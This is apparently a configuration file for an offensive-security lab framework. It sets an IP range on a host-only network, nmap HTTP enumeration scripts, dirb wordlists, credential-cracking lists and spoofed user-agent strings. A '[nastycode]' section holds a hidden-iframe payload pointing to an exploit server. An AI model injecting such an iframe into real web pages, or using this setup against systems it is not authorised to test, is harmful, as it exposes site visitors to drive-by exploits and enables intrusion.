[hosts]
iprange: 192.168.56.1-254
fulliprng: 192.168.56.1-254
opth: /root/offsecfw/results/ipList.gnmap
olst: /root/offsecfw/results/ipList.txt

[base]
rootpth: /root
labpath: /root/offsecfw

[paths]
basepth: /root/offsecfw
rsltpth: /root/offsecfw/results
exampth: /root/offsecfw/results
nmappth: /root/offsecfw/results/

[nmapscripts]
httpnse: http-vhosts,http-userdir-enum,http-apache-negotiation,http-backup-finder,http-config-backup,http-default-accounts,http-methods,http-method-tamper,http-passwd,http-robots.txt,http-screenshot-html
nsepth: /usr/share/nmap/scripts

[wordlist]
wordlst: /usr/share/dirb/wordlists
shortlst: indexes.txt,small.txt
moderlst: indexes.txt,common.txt,small.txt,mutations_common.txt,extensions_common.txt

[vuln]
vulns: /usr/share/dirb/wordlists/vulns

[crack]
usrlst: /root/offsecfw/wordlists/users.txt
pwdlst: /root/offsecfw/wordlists/passwords.txt
fzzlst: /root/offsecfw/wordlists/users.txt

[useragent]
uagnt1: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
uagnt2: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
uagnt3: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
uagnt4: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)
uagnt5: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

[nastycode]
iframe1: <iframe src="192.168.56.1:8080/exploit" style="visibility:hidden;display:none"></iframe>
